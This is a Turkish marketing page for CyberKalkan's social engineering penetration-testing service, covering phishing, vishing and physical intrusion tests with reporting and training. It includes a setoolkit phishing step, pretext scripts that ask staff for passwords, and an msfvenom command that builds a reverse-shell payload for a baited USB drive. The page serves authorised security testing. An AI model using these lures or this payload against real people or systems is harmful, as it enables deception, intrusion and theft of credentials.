CYBERKALKAN Siber güvenlik sadece yazılım açıklarından ibaret değildir.
En zayıf halka her zaman “insan”dır.
CyberKalkan olarak bu zayıf halkayı güçlendirmek için sosyal mühendislik testleri sunuyoruz.
Bu testler sayesinde çalışanlarınızın siber saldırılara karşı farkındalık seviyesi ölçülür ve geliştirilir.
📌 Sosyal Mühendislik Nedir?
Sosyal mühendislik, insanları kandırarak bilgi elde etme sanatıdır.
Bir hacker için en kolay yol, sistemleri değil insanları kandırmaktır.
Sosyal mühendislik testleriyle şu sorulara cevap ararız:
- Çalışanlar sahte e-postalara tıklıyor mu?
- Kurum politikalarına uygun hareket ediyorlar mı?
- Şifrelerini paylaşıyorlar mı?
- Bir yabancıya sistem içinden bilgi verirler mi?
CyberKalkan, bu senaryoları gerçek bir saldırgan gibi ama zarar vermeden uygular.
🧪 Test Türleri ve Senaryolar
Aşağıda uyguladığımız temel sosyal mühendislik senaryoları listelenmiştir:
1️⃣ Phishing (Oltalama) E-posta Testleri
📨 Çalışanlara sahte ama ikna edici e-postalar gönderilir.
Amaç, kullanıcıyı tıklatmak veya giriş bilgilerini vermesini sağlamaktır.
🛠️ Örnek komutlar:
setoolkit
# Social-Engineering Attacks > Spear-Phishing Attack Vectors
🕵️♂️ E-posta senaryoları:
- Maaş bordrosu için giriş isteyen sahte HR maili
- Kargo takip linki içeren sahte UPS maili
- Şirket içi anket gibi görünerek kullanıcı adı/şifre isteyen link
Sonuçlar:
- Kimler tıkladı
- Kimler bilgi girdi
- Kimler e-postayı bildirmedi
2️⃣ Telefonla Bilgi Toplama (Vishing)
📞 Gerçek bir müşteri ya da iş ortağı gibi aranarak bilgi istenilir.
Senaryo örnekleri:
- “BT departmanından arıyoruz, sistem güncellemesi yapacağız. Şifrenizi verir misiniz?”
- “X şirketinden arıyorum, sözleşme öncesi IT altyapınızı öğrenmek istiyoruz.”
CyberKalkan bu aramaları kayıt altına almaz, ancak sonuçları yazılı olarak raporlar.
3️⃣ Fiziksel Sosyal Mühendislik (Opsiyonel)
🔐 Kurum binasına giriş yapılarak güvenlik test edilir.
Senaryo:
- Şirket çalışanı gibi davranmak
- Kimlik kartı takarak giriş yapmak
- USB bırakmak (payloads içeren)
USB örneği hazırlanabilir:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=... LPORT=... -f exe > payload.exe
USB üzerine etiket:
📎 “Müşteri Listesi – Acil Sunum”
📊 Raporlama ve Eğitim
CyberKalkan olarak yaptığımız her sosyal mühendislik testinin ardından detaylı rapor sunarız:
- Kimler kandı
- Kim ne tür hatalar yaptı
- Hangi senaryo daha çok işe yaradı
- Hangi kişi/senaryo en dirençliydi
Ardından dilerseniz:
- Farkındalık eğitimi
- Kurumsal güvenlik rehberi
- Test sonrası tekrar uygulama (retest)
🎯 CyberKalkan ile Avantajlarınız
- %100 özelleştirilmiş saldırı senaryoları
- Sadece teknik değil, davranışsal testler
- Detaylı istatistik ve görsellerle zenginleştirilmiş rapor
- Personelinizi suçlamadan bilinçlendirme yaklaşımı
- Dilerseniz birebir açıklamalı sonuç sunumu
💡 Sosyal Mühendislik Ne Kazandırır?
- Sadece yazılım değil, insan güvenliğinizi test eder.
- Gerçek saldırganlardan önce, CyberKalkan testleriyle farkındalık kazanırsınız.
- Phishing, vishing ve sahte senaryolara karşı savunmanızı güçlendirirsiniz.
- Kurum içi güvenlik politikalarını güncelleme ihtiyacınızı gösterir.
📬 Hemen İletişime Geçin – CyberKalkan Yanınızda
Unutmayın, bir hacker için en kolay hedef bilgisayar değil, insandır.
Sosyal mühendislik testlerimiz ile insan faktörünüzü güçlendirin.
CyberKalkan farkıyla saldırganlardan önce sisteminizi, sürecinizi ve personelinizi test edin.
📧 E-posta: info@cyberkalkan.com.tr
📞 Telefon: +90 537 791 62 19
🌐 İletişim Sayfası: https://cyberkalkan.com.tr/iletisim